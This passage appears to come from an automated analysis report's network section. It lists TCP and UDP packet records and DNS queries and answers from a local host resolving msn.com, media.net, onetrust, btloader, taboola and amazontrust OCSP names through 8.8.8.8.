Sep 10, 2021 11:28:24.750067949 CEST  443  49821  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.750142097 CEST  49821  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.750168085 CEST  443  49821  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.750185966 CEST  443  49821  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.750247955 CEST  49821  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.750299931 CEST  443  49821  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.750386000 CEST  49821  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.750402927 CEST  443  49821  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.750438929 CEST  443  49818  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.750488997 CEST  49821  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.750505924 CEST  443  49821  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.750725031 CEST  443  49821  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.750746965 CEST  49818  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.750758886 CEST  49821  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.750765085 CEST  443  49818  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.750787020 CEST  443  49821  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.750797033 CEST  49821  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.750824928 CEST  49818  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.750854969 CEST  49821  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.750873089 CEST  443  49821  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.750936985 CEST  49821  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.751414061 CEST  443  49821  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.751588106 CEST  443  49821  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.751605988 CEST  49818  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.751660109 CEST  49821  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.751688004 CEST  443  49821  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.751806974 CEST  443  49818  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.751883984 CEST  49818  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.751919985 CEST  49821  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.752126932 CEST  443  49821  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.752335072 CEST  49821  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.752361059 CEST  443  49821  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.752707005 CEST  49821  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.753156900 CEST  443  49821  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.753426075 CEST  49821  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.753460884 CEST  443  49821  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.753528118 CEST  49821  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.755590916 CEST  49817  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.755721092 CEST  443  49817  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.755794048 CEST  49817  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.771270990 CEST  49821  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.771452904 CEST  443  49821  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.771557093 CEST  49821  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:34.882105112 CEST  443  49767  104.20.185.68  192.168.2.5
Sep 10, 2021 11:28:34.882185936 CEST  49767  443  192.168.2.5  104.20.185.68
Sep 10, 2021 11:28:35.079473972 CEST  443  49767  104.20.185.68  192.168.2.5
Sep 10, 2021 11:28:35.079576015 CEST  49767  443  192.168.2.5  104.20.185.68
Sep 10, 2021 11:28:35.224147081 CEST  443  49783  104.26.7.139  192.168.2.5
Sep 10, 2021 11:28:35.224304914 CEST  49783  443  192.168.2.5  104.26.7.139
Sep 10, 2021 11:28:35.423747063 CEST  443  49783  104.26.7.139  192.168.2.5
Sep 10, 2021 11:28:35.423866987 CEST  49783  443  192.168.2.5  104.26.7.139
Sep 10, 2021 11:29:29.341856956 CEST  49902  80  192.168.2.5  13.225.29.199
Sep 10, 2021 11:29:29.342384100 CEST  49903  80  192.168.2.5  13.225.29.199
Sep 10, 2021 11:29:29.368361950 CEST  80  49902  13.225.29.199  192.168.2.5
Sep 10, 2021 11:29:29.368468046 CEST  80  49903  13.225.29.199  192.168.2.5
Sep 10, 2021 11:29:29.368531942 CEST  49902  80  192.168.2.5  13.225.29.199
Sep 10, 2021 11:29:29.368578911 CEST  49903  80  192.168.2.5  13.225.29.199
Sep 10, 2021 11:29:29.369950056 CEST  49902  80  192.168.2.5  13.225.29.199
Sep 10, 2021 11:29:29.380408049 CEST  80  49902  13.225.29.199  192.168.2.5
Sep 10, 2021 11:29:29.380575895 CEST  49902  80  192.168.2.5  13.225.29.199
Sep 10, 2021 11:29:29.384037971 CEST  80  49903  13.225.29.199  192.168.2.5
Sep 10, 2021 11:29:29.384238958 CEST  49903  80  192.168.2.5  13.225.29.199
Sep 10, 2021 11:29:29.396130085 CEST  80  49902  13.225.29.199  192.168.2.5
Sep 10, 2021 11:29:29.450870037 CEST  80  49902  13.225.29.199  192.168.2.5
Sep 10, 2021 11:29:29.450978994 CEST  49902  80  192.168.2.5  13.225.29.199
Sep 10, 2021 11:29:35.671751022 CEST  49910  80  192.168.2.5  13.225.29.132
Sep 10, 2021 11:29:35.676143885 CEST  49911  80  192.168.2.5  13.225.29.132
Sep 10, 2021 11:29:35.698846102 CEST  80  49910  13.225.29.132  192.168.2.5
Sep 10, 2021 11:29:35.699101925 CEST  49910  80  192.168.2.5  13.225.29.132
Sep 10, 2021 11:29:35.701522112 CEST  49910  80  192.168.2.5  13.225.29.132
Sep 10, 2021 11:29:35.703577042 CEST  80  49911  13.225.29.132  192.168.2.5
Sep 10, 2021 11:29:35.703944921 CEST  49911  80  192.168.2.5  13.225.29.132
Sep 10, 2021 11:29:35.713876963 CEST  80  49910  13.225.29.132  192.168.2.5
Sep 10, 2021 11:29:35.713984013 CEST  49910  80  192.168.2.5  13.225.29.132
Sep 10, 2021 11:29:35.728111029 CEST  80  49911  13.225.29.132  192.168.2.5
Sep 10, 2021 11:29:35.728230000 CEST  80  49910  13.225.29.132  192.168.2.5
Sep 10, 2021 11:29:35.728379011 CEST  49911  80  192.168.2.5  13.225.29.132
Sep 10, 2021 11:29:35.792062998 CEST  80  49910  13.225.29.132  192.168.2.5
Sep 10, 2021 11:29:35.794589043 CEST  49910  80  192.168.2.5  13.225.29.132
Sep 10, 2021 11:29:51.558620930 CEST  49954  80  192.168.2.5  13.225.29.199
Sep 10, 2021 11:29:51.558720112 CEST  49955  80  192.168.2.5  13.225.29.199
Sep 10, 2021 11:29:51.585236073 CEST  80  49955  13.225.29.199  192.168.2.5
Sep 10, 2021 11:29:51.585274935 CEST  80  49954  13.225.29.199  192.168.2.5
Sep 10, 2021 11:29:51.585434914 CEST  49954  80  192.168.2.5  13.225.29.199
Sep 10, 2021 11:29:51.585448027 CEST  49955  80  192.168.2.5  13.225.29.199
Sep 10, 2021 11:29:51.585664034 CEST  49955  80  192.168.2.5  13.225.29.199
Sep 10, 2021 11:29:51.607537031 CEST  80  49955  13.225.29.199  192.168.2.5
Sep 10, 2021 11:29:51.607640982 CEST  49955  80  192.168.2.5  13.225.29.199
Sep 10, 2021 11:29:51.612251997 CEST  80  49955  13.225.29.199  192.168.2.5
Sep 10, 2021 11:29:51.669495106 CEST  80  49955  13.225.29.199  192.168.2.5
Sep 10, 2021 11:29:51.669645071 CEST  49955  80  192.168.2.5  13.225.29.199
Sep 10, 2021 11:29:59.395843029 CEST  80  49903  13.225.29.199  192.168.2.5
Sep 10, 2021 11:29:59.397609949 CEST  49903  80  192.168.2.5  13.225.29.199
Sep 10, 2021 11:30:04.958889961 CEST  49783  443  192.168.2.5  104.26.7.139
Sep 10, 2021 11:30:04.958955050 CEST  49783  443  192.168.2.5  104.26.7.139
Sep 10, 2021 11:30:04.959628105 CEST  49767  443  192.168.2.5  104.20.185.68
Sep 10, 2021 11:30:04.959683895 CEST  49767  443  192.168.2.5  104.20.185.68
Sep 10, 2021 11:30:05.731026888 CEST  80  49911  13.225.29.132  192.168.2.5
Sep 10, 2021 11:30:05.731137037 CEST  49911  80  192.168.2.5  13.225.29.132
Sep 10, 2021 11:30:16.363599062 CEST  49968  80  192.168.2.5  13.225.29.204
Sep 10, 2021 11:30:16.364242077 CEST  49969  80  192.168.2.5  13.225.29.204
Sep 10, 2021 11:30:16.391508102 CEST  80  49968  13.225.29.204  192.168.2.5
Sep 10, 2021 11:30:16.391814947 CEST  80  49969  13.225.29.204  192.168.2.5
Sep 10, 2021 11:30:16.394807100 CEST  49969  80  192.168.2.5  13.225.29.204
Sep 10, 2021 11:30:16.394812107 CEST  49968  80  192.168.2.5  13.225.29.204
Sep 10, 2021 11:30:16.402246952 CEST  80  49968  13.225.29.204  192.168.2.5
Sep 10, 2021 11:30:16.402348995 CEST  49968  80  192.168.2.5  13.225.29.204
Sep 10, 2021 11:30:16.404545069 CEST  49969  80  192.168.2.5  13.225.29.204
Sep 10, 2021 11:30:16.414880991 CEST  80  49969  13.225.29.204  192.168.2.5
Sep 10, 2021 11:30:16.414988041 CEST  49969  80  192.168.2.5  13.225.29.204
Sep 10, 2021 11:30:16.432553053 CEST  80  49969  13.225.29.204  192.168.2.5
Sep 10, 2021 11:30:16.717156887 CEST  80  49969  13.225.29.204  192.168.2.5
Sep 10, 2021 11:30:16.717315912 CEST  49969  80  192.168.2.5  13.225.29.204
Sep 10, 2021 11:30:21.612600088 CEST  80  49954  13.225.29.199  192.168.2.5
Sep 10, 2021 11:30:21.612720966 CEST  49954  80  192.168.2.5  13.225.29.199
Sep 10, 2021 11:30:46.422378063 CEST  80  49968  13.225.29.204  192.168.2.5
Sep 10, 2021 11:30:46.422643900 CEST  49968  80  192.168.2.5  13.225.29.204

UDP Packets

Timestamp  Source Port  Dest Port  Source IP  Dest IP
Sep 10, 2021 11:28:13.748769045 CEST  52441  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:28:13.784257889 CEST  53  52441  8.8.8.8  192.168.2.5
Sep 10, 2021 11:28:15.706577063 CEST  62176  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:28:15.734880924 CEST  53  62176  8.8.8.8  192.168.2.5
Sep 10, 2021 11:28:16.219919920 CEST  59596  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:28:16.247761965 CEST  53  59596  8.8.8.8  192.168.2.5
Sep 10, 2021 11:28:16.711635113 CEST  65296  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:28:16.736382961 CEST  63183  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:28:16.750183105 CEST  53  65296  8.8.8.8  192.168.2.5
Sep 10, 2021 11:28:16.775331974 CEST  53  63183  8.8.8.8  192.168.2.5
Sep 10, 2021 11:28:19.458614111 CEST  60151  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:28:19.499867916 CEST  53  60151  8.8.8.8  192.168.2.5
Sep 10, 2021 11:28:19.808762074 CEST  56969  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:28:19.839265108 CEST  53  56969  8.8.8.8  192.168.2.5
Sep 10, 2021 11:28:19.886234045 CEST  55161  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:28:19.921276093 CEST  53  55161  8.8.8.8  192.168.2.5
Sep 10, 2021 11:28:20.111187935 CEST  54757  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:28:20.146970034 CEST  53  54757  8.8.8.8  192.168.2.5
Sep 10, 2021 11:28:21.565500975 CEST  49992  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:28:21.601167917 CEST  53  49992  8.8.8.8  192.168.2.5
Sep 10, 2021 11:28:22.062802076 CEST  60075  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:28:22.101077080 CEST  53  60075  8.8.8.8  192.168.2.5
Sep 10, 2021 11:28:22.938153982 CEST  55016  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:28:22.975914955 CEST  53  55016  8.8.8.8  192.168.2.5
Sep 10, 2021 11:28:23.347479105 CEST  64345  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:28:23.389220953 CEST  53  64345  8.8.8.8  192.168.2.5
Sep 10, 2021 11:28:23.511346102 CEST  57128  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:28:23.536730051 CEST  53  57128  8.8.8.8  192.168.2.5
Sep 10, 2021 11:28:24.558005095 CEST  54791  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:28:24.585437059 CEST  53  54791  8.8.8.8  192.168.2.5
Sep 10, 2021 11:28:38.539724112 CEST  50463  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:28:38.573756933 CEST  53  50463  8.8.8.8  192.168.2.5
Sep 10, 2021 11:28:40.335247040 CEST  50394  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:28:40.384668112 CEST  53  50394  8.8.8.8  192.168.2.5
Sep 10, 2021 11:28:43.697774887 CEST  58530  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:28:43.731348991 CEST  53  58530  8.8.8.8  192.168.2.5
Sep 10, 2021 11:28:44.689608097 CEST  58530  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:28:44.726703882 CEST  53  58530  8.8.8.8  192.168.2.5
Sep 10, 2021 11:28:44.884803057 CEST  53813  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:28:44.925837040 CEST  53  53813  8.8.8.8  192.168.2.5
Sep 10, 2021 11:28:45.780903101 CEST  58530  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:28:45.814582109 CEST  53  58530  8.8.8.8  192.168.2.5
Sep 10, 2021 11:28:45.876383066 CEST  53813  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:28:45.905706882 CEST  53  53813  8.8.8.8  192.168.2.5
Sep 10, 2021 11:28:46.895987988 CEST  53813  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:28:46.931405067 CEST  53  53813  8.8.8.8  192.168.2.5
Sep 10, 2021 11:28:47.782418966 CEST  58530  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:28:47.816689014 CEST  53  58530  8.8.8.8  192.168.2.5
Sep 10, 2021 11:28:48.857429028 CEST  53813  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:28:48.894952059 CEST  53  53813  8.8.8.8  192.168.2.5
Sep 10, 2021 11:28:51.719892979 CEST  63732  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:28:51.749866009 CEST  53  63732  8.8.8.8  192.168.2.5
Sep 10, 2021 11:28:51.833105087 CEST  58530  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:28:51.866637945 CEST  53  58530  8.8.8.8  192.168.2.5
Sep 10, 2021 11:28:52.904275894 CEST  53813  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:28:52.939781904 CEST  53  53813  8.8.8.8  192.168.2.5
Sep 10, 2021 11:28:54.897401094 CEST  57344  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:28:54.932523012 CEST  53  57344  8.8.8.8  192.168.2.5
Sep 10, 2021 11:28:56.957859993 CEST  54450  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:28:56.990983009 CEST  53  54450  8.8.8.8  192.168.2.5
Sep 10, 2021 11:28:58.685632944 CEST  59261  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:28:58.718434095 CEST  53  59261  8.8.8.8  192.168.2.5
Sep 10, 2021 11:29:01.923851013 CEST  57151  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:29:01.948863029 CEST  53  57151  8.8.8.8  192.168.2.5
Sep 10, 2021 11:29:06.193099976 CEST  59413  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:29:06.226480961 CEST  53  59413  8.8.8.8  192.168.2.5
Sep 10, 2021 11:29:09.472971916 CEST  60516  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:29:09.506478071 CEST  53  60516  8.8.8.8  192.168.2.5
Sep 10, 2021 11:29:09.558235884 CEST  51649  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:29:09.591897964 CEST  53  51649  8.8.8.8  192.168.2.5
Sep 10, 2021 11:29:10.559912920 CEST  51649  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:29:10.593313932 CEST  53  51649  8.8.8.8  192.168.2.5
Sep 10, 2021 11:29:11.467993975 CEST  65086  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:29:11.501324892 CEST  53  65086  8.8.8.8  192.168.2.5
Sep 10, 2021 11:29:11.561897993 CEST  51649  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:29:11.595700979 CEST  53  51649  8.8.8.8  192.168.2.5
Sep 10, 2021 11:29:13.612844944 CEST  51649  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:29:13.647855043 CEST  53  51649  8.8.8.8  192.168.2.5
Sep 10, 2021 11:29:14.872776985 CEST  56432  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:29:14.908098936 CEST  53  56432  8.8.8.8  192.168.2.5
Sep 10, 2021 11:29:17.612792015 CEST  51649  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:29:17.641422033 CEST  53  51649  8.8.8.8  192.168.2.5
Sep 10, 2021 11:29:18.531658888 CEST  52929  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:29:18.567233086 CEST  53  52929  8.8.8.8  192.168.2.5
Sep 10, 2021 11:29:19.074461937 CEST  64317  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:29:19.104486942 CEST  53  64317  8.8.8.8  192.168.2.5
Sep 10, 2021 11:29:29.237571001 CEST  61004  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:29:29.270366907 CEST  56895  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:29:29.271456957 CEST  53  61004  8.8.8.8  192.168.2.5
Sep 10, 2021 11:29:29.313858986 CEST  53  56895  8.8.8.8  192.168.2.5
Sep 10, 2021 11:29:30.026762009 CEST  62372  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:29:30.055349112 CEST  53  62372  8.8.8.8  192.168.2.5
Sep 10, 2021 11:29:35.589313984 CEST  61515  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:29:35.626282930 CEST  53  61515  8.8.8.8  192.168.2.5
Sep 10, 2021 11:29:37.713468075 CEST  56675  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:29:37.746651888 CEST  53  56675  8.8.8.8  192.168.2.5
Sep 10, 2021 11:29:43.380201101 CEST  57172  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:29:43.414191008 CEST  53  57172  8.8.8.8  192.168.2.5
Sep 10, 2021 11:29:46.803185940 CEST  55267  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:29:46.843158007 CEST  53  55267  8.8.8.8  192.168.2.5
Sep 10, 2021 11:29:51.519062996 CEST  50969  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:29:51.551887989 CEST  53  50969  8.8.8.8  192.168.2.5
Sep 10, 2021 11:29:54.840034962 CEST  64362  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:29:54.872912884 CEST  53  64362  8.8.8.8  192.168.2.5
Sep 10, 2021 11:29:58.633409023 CEST  54766  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:29:58.663350105 CEST  53  54766  8.8.8.8  192.168.2.5
Sep 10, 2021 11:29:59.667192936 CEST  54766  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:29:59.697319031 CEST  53  54766  8.8.8.8  192.168.2.5
Sep 10, 2021 11:30:00.667237043 CEST  54766  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:30:00.705388069 CEST  53  54766  8.8.8.8  192.168.2.5
Sep 10, 2021 11:30:02.524331093 CEST  61446  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:30:02.559146881 CEST  53  61446  8.8.8.8  192.168.2.5
Sep 10, 2021 11:30:02.729496002 CEST  54766  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:30:02.760375977 CEST  53  54766  8.8.8.8  192.168.2.5
Sep 10, 2021 11:30:04.103563070 CEST  57515  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:30:04.139197111 CEST  53  57515  8.8.8.8  192.168.2.5
Sep 10, 2021 11:30:05.097162008 CEST  57515  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:30:05.125163078 CEST  53  57515  8.8.8.8  192.168.2.5
Sep 10, 2021 11:30:06.144722939 CEST  57515  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:30:06.173379898 CEST  53  57515  8.8.8.8  192.168.2.5
Sep 10, 2021 11:30:06.769252062 CEST  54766  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:30:06.800507069 CEST  53  54766  8.8.8.8  192.168.2.5
Sep 10, 2021 11:30:08.191401958 CEST  57515  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:30:08.219232082 CEST  53  57515  8.8.8.8  192.168.2.5
Sep 10, 2021 11:30:12.248290062 CEST  57515  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:30:12.288125038 CEST  53  57515  8.8.8.8  192.168.2.5
Sep 10, 2021 11:30:16.321193933 CEST  58199  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:30:16.352951050 CEST  53  58199  8.8.8.8  192.168.2.5
Sep 10, 2021 11:30:21.265086889 CEST  65221  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:30:21.298093081 CEST  53  65221  8.8.8.8  192.168.2.5
Sep 10, 2021 11:30:22.266185999 CEST  65221  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:30:22.291155100 CEST  53  65221  8.8.8.8  192.168.2.5
Sep 10, 2021 11:30:23.266736984 CEST  65221  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:30:23.294195890 CEST  53  65221  8.8.8.8  192.168.2.5
Sep 10, 2021 11:30:25.387281895 CEST  65221  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:30:25.413050890 CEST  53  65221  8.8.8.8  192.168.2.5
Sep 10, 2021 11:30:26.722629070 CEST  61573  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:30:26.758687019 CEST  53  61573  8.8.8.8  192.168.2.5
Sep 10, 2021 11:30:29.401053905 CEST  65221  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:30:29.434274912 CEST  53  65221  8.8.8.8  192.168.2.5
Sep 10, 2021 11:30:36.584817886 CEST  56562  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:30:36.634388924 CEST  53  56562  8.8.8.8  192.168.2.5
Sep 10, 2021 11:30:37.573323011 CEST  53591  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:30:37.612714052 CEST  53  53591  8.8.8.8  192.168.2.5
Sep 10, 2021 11:30:38.127902031 CEST  59688  53  192.168.2.5  8.8.8.8
Sep 10, 2021 11:30:38.162178040 CEST  53  59688  8.8.8.8  192.168.2.5
Sep 10, 2021 11:30:38.446222067 CEST  56032  53  192.168.2.5  8.8.8.8
                                                Sep 10, 2021 11:30:38.482167006 CEST53560328.8.8.8192.168.2.5
                                                Sep 10, 2021 11:30:38.843164921 CEST6115053192.168.2.58.8.8.8
                                                Sep 10, 2021 11:30:38.871268988 CEST53611508.8.8.8192.168.2.5
                                                Sep 10, 2021 11:30:39.226557016 CEST6345853192.168.2.58.8.8.8
                                                Sep 10, 2021 11:30:39.259440899 CEST53634588.8.8.8192.168.2.5
                                                Sep 10, 2021 11:30:39.584393024 CEST5042253192.168.2.58.8.8.8
                                                Sep 10, 2021 11:30:39.609138012 CEST53504228.8.8.8192.168.2.5
                                                Sep 10, 2021 11:30:40.076759100 CEST5324753192.168.2.58.8.8.8
                                                Sep 10, 2021 11:30:40.112530947 CEST53532478.8.8.8192.168.2.5
                                                Sep 10, 2021 11:30:40.656224012 CEST5854453192.168.2.58.8.8.8
                                                Sep 10, 2021 11:30:40.685964108 CEST53585448.8.8.8192.168.2.5
                                                Sep 10, 2021 11:30:41.008152962 CEST5381453192.168.2.58.8.8.8
                                                Sep 10, 2021 11:30:41.041130066 CEST53538148.8.8.8192.168.2.5
                                                Sep 10, 2021 11:31:00.052069902 CEST5130553192.168.2.58.8.8.8
                                                Sep 10, 2021 11:31:00.094192028 CEST53513058.8.8.8192.168.2.5

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Sep 10, 2021 11:28:16.219919920 CEST | 192.168.2.5 | 8.8.8.8 | 0xcb34 | Standard query (0) | www.msn.com | A (IP address) | IN (0x0001)
Sep 10, 2021 11:28:19.458614111 CEST | 192.168.2.5 | 8.8.8.8 | 0xc3df | Standard query (0) | web.vortex.data.msn.com | A (IP address) | IN (0x0001)
Sep 10, 2021 11:28:19.808762074 CEST | 192.168.2.5 | 8.8.8.8 | 0x7fc4 | Standard query (0) | geolocation.onetrust.com | A (IP address) | IN (0x0001)
Sep 10, 2021 11:28:19.886234045 CEST | 192.168.2.5 | 8.8.8.8 | 0xf1bb | Standard query (0) | contextual.media.net | A (IP address) | IN (0x0001)
Sep 10, 2021 11:28:20.111187935 CEST | 192.168.2.5 | 8.8.8.8 | 0x8d6c | Standard query (0) | btloader.com | A (IP address) | IN (0x0001)
Sep 10, 2021 11:28:22.062802076 CEST | 192.168.2.5 | 8.8.8.8 | 0xad2e | Standard query (0) | hblg.media.net | A (IP address) | IN (0x0001)
Sep 10, 2021 11:28:22.938153982 CEST | 192.168.2.5 | 8.8.8.8 | 0xd68d | Standard query (0) | lg3.media.net | A (IP address) | IN (0x0001)
Sep 10, 2021 11:28:23.347479105 CEST | 192.168.2.5 | 8.8.8.8 | 0x73bd | Standard query (0) | cvision.media.net | A (IP address) | IN (0x0001)
Sep 10, 2021 11:28:23.511346102 CEST | 192.168.2.5 | 8.8.8.8 | 0x5081 | Standard query (0) | srtb.msn.com | A (IP address) | IN (0x0001)
Sep 10, 2021 11:28:24.558005095 CEST | 192.168.2.5 | 8.8.8.8 | 0x85e9 | Standard query (0) | img.img-taboola.com | A (IP address) | IN (0x0001)
Sep 10, 2021 11:29:29.270366907 CEST | 192.168.2.5 | 8.8.8.8 | 0x17c6 | Standard query (0) | ocsp.sca1b.amazontrust.com | A (IP address) | IN (0x0001)
Sep 10, 2021 11:29:35.589313984 CEST | 192.168.2.5 | 8.8.8.8 | 0xd4f | Standard query (0) | ocsp.sca1b.amazontrust.com | A (IP address) | IN (0x0001)
Sep 10, 2021 11:29:51.519062996 CEST | 192.168.2.5 | 8.8.8.8 | 0xf8d | Standard query (0) | ocsp.sca1b.amazontrust.com | A (IP address) | IN (0x0001)
Sep 10, 2021 11:30:16.321193933 CEST | 192.168.2.5 | 8.8.8.8 | 0xaa17 | Standard query (0) | ocsp.sca1b.amazontrust.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Sep 10, 2021 11:28:16.247761965 CEST | 8.8.8.8 | 192.168.2.5 | 0xcb34 | No error (0) | www.msn.com | www-msn-com.a-0003.a-msedge.net | - | CNAME (Canonical name) | IN (0x0001)
Sep 10, 2021 11:28:19.499867916 CEST | 8.8.8.8 | 192.168.2.5 | 0xc3df | No error (0) | web.vortex.data.msn.com | web.vortex.data.microsoft.com | - | CNAME (Canonical name) | IN (0x0001)
Sep 10, 2021 11:28:19.839265108 CEST | 8.8.8.8 | 192.168.2.5 | 0x7fc4 | No error (0) | geolocation.onetrust.com | - | 104.20.185.68 | A (IP address) | IN (0x0001)
Sep 10, 2021 11:28:19.839265108 CEST | 8.8.8.8 | 192.168.2.5 | 0x7fc4 | No error (0) | geolocation.onetrust.com | - | 104.20.184.68 | A (IP address) | IN (0x0001)
Sep 10, 2021 11:28:19.921276093 CEST | 8.8.8.8 | 192.168.2.5 | 0xf1bb | No error (0) | contextual.media.net | - | 2.18.160.23 | A (IP address) | IN (0x0001)
Sep 10, 2021 11:28:20.146970034 CEST | 8.8.8.8 | 192.168.2.5 | 0x8d6c | No error (0) | btloader.com | - | 104.26.7.139 | A (IP address) | IN (0x0001)
Sep 10, 2021 11:28:20.146970034 CEST | 8.8.8.8 | 192.168.2.5 | 0x8d6c | No error (0) | btloader.com | - | 104.26.6.139 | A (IP address) | IN (0x0001)
Sep 10, 2021 11:28:20.146970034 CEST | 8.8.8.8 | 192.168.2.5 | 0x8d6c | No error (0) | btloader.com | - | 172.67.70.134 | A (IP address) | IN (0x0001)
Sep 10, 2021 11:28:22.101077080 CEST | 8.8.8.8 | 192.168.2.5 | 0xad2e | No error (0) | hblg.media.net | - | 2.18.160.23 | A (IP address) | IN (0x0001)
Sep 10, 2021 11:28:22.975914955 CEST | 8.8.8.8 | 192.168.2.5 | 0xd68d | No error (0) | lg3.media.net | - | 2.18.160.23 | A (IP address) | IN (0x0001)
Sep 10, 2021 11:28:23.389220953 CEST | 8.8.8.8 | 192.168.2.5 | 0x73bd | No error (0) | cvision.media.net | cvision.media.net.edgekey.net | - | CNAME (Canonical name) | IN (0x0001)
